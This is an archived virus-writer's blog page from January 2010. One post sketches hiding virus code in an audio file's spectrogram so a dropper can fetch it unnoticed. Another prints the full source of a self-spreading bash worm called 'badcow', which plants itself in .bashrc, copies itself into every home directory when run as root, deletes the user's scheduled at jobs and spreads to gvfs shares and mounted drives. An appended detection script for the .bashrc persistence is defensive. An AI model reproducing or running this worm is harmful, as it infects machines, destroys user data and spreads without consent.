Archive for January, 2010

Hide virus in sounds …
Sunday, January 3rd, 2010
I have just discovered a nice tool called arss that allows you to play with the spectrogram of sound signals.
It would be very cool to use this for vx stuff.
You could, for example, hide the virus code in the spectrum of an audio file so the virus can be stored on an HTTP server and then downloaded (and extracted) using a dropper to the host system …
There is no suspicious traffic this way.

Bash scripting 2
Friday, January 1st, 2010
I have improved the bash worm a bit; it now uses gvfs features too.
#!/bin/bash
# the badcow by WarGame
if [ ! -f "$HOME/.badcow.sh" ];
then
    echo $HOME/.badcow.sh >> $HOME/.bashrc
fi
cp $0 $HOME/.badcow.sh > /dev/null 2>&1
chmod +x $HOME/.badcow.sh > /dev/null 2>&1
if [ "$(id -u)" = "0" ];
then
    for dr_home in `ls /home`
    do
        if [ -d "/home/$dr_home" ];
        then
            if [ ! -f "/home/$dr_home/.badcow.sh" ];
            then
                echo /home/$dr_home/.badcow.sh >> /home/$dr_home/.bashrc
            fi
            cp $HOME/.badcow.sh /home/$dr_home/.badcow.sh > /dev/null 2>&1
            chmod 0755 /home/$dr_home/.badcow.sh > /dev/null 2>&1
            chmod +x /home/$dr_home/.badcow.sh > /dev/null 2>&1
        fi
    done
    exit 0
fi
if [ -d "$HOME/.gvfs" ]; # try to spread using the gnome virtual filesystem
then
    for vfs in `ls $HOME/.gvfs`
    do
        if [ -d "$HOME/.gvfs/$vfs" ];
        then
            cp $HOME/.badcow.sh $HOME/.gvfs/$vfs/badcow.sh > /dev/null 2>&1
            chmod +x $HOME/.gvfs/$vfs/badcow.sh > /dev/null 2>&1
        fi
    done
fi
for job in $(atq | awk '{print $1}' )
do
    atrm $job > /dev/null 2>&1
done
at now + 10 minutes -f $HOME/.badcow.sh > /dev/null 2>&1
for dr in $(mount | awk '{print $3}' ) # try to copy itself in mounted drives
do
    if [ -d "$dr" ];
    then
        cp $HOME/.badcow.sh $dr/badcow.sh > /dev/null 2>&1
        chmod +x $dr/badcow.sh > /dev/null 2>&1
    fi
done
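
A defender's check for the persistence step in the script above (a bare path to a hidden script appended to .bashrc), as an added example that is not part of the original post. The function names, the sample file name .updater.sh and the temporary directory are assumptions constructed for illustration; the check also covers the ~/ and $HOME/ spellings and the .profile and .bash_profile startup files.

```sh
#!/bin/sh
# Added example, not from the original post. Prints "rcfile:line:path" for every
# startup-file line whose command word is an executable hidden file sitting
# directly in the home directory (the pattern the script above leaves behind).
audit_rc() {
    home=${1%/}; shift
    [ $# -gt 0 ] || set -- .bashrc .profile .bash_profile
    for rc in "$@"; do
        [ -f "$home/$rc" ] || continue
        # awk emits "lineno first-word" for each non-blank, non-comment line
        awk 'NF && $1 !~ /^#/ { print NR, $1 }' "$home/$rc" |
        while read -r lineno word; do
            case $word in            # normalise common spellings of the home dir
                '~/'*)     path=$home/${word#\~/} ;;
                '$HOME/'*) path=$home/${word#\$HOME/} ;;
                *)         path=$word ;;
            esac
            name=${path#"$home"/}
            case $name in
                "$path"|*/*) continue ;;  # outside the home dir, or in a subdirectory
                .?*) ;;                   # hidden file directly in the home dir
                *) continue ;;
            esac
            # Sourcing dotfiles (". ~/.bash_aliases") is normal; executing one is not.
            if [ -f "$path" ] && [ -x "$path" ]; then
                printf '%s:%s:%s\n' "$rc" "$lineno" "$path"
            fi
        done
    done
    return 0
}

# Constructed sample home directory (hypothetical file names) so this runs offline.
make_sample_home() {
    d=$(mktemp -d) || return 1
    printf '#!/bin/sh\n' > "$d/.updater.sh"
    chmod +x "$d/.updater.sh"
    printf '%s\n' '# aliases' '. ~/.bash_aliases' 'export PATH=$PATH:~/bin' \
        "$d/.updater.sh" > "$d/.bashrc"
    printf '%s\n' "$d"
}

sample=$(make_sample_home) && audit_rc "$sample"   # flags .bashrc line 4
rm -rf "$sample"
```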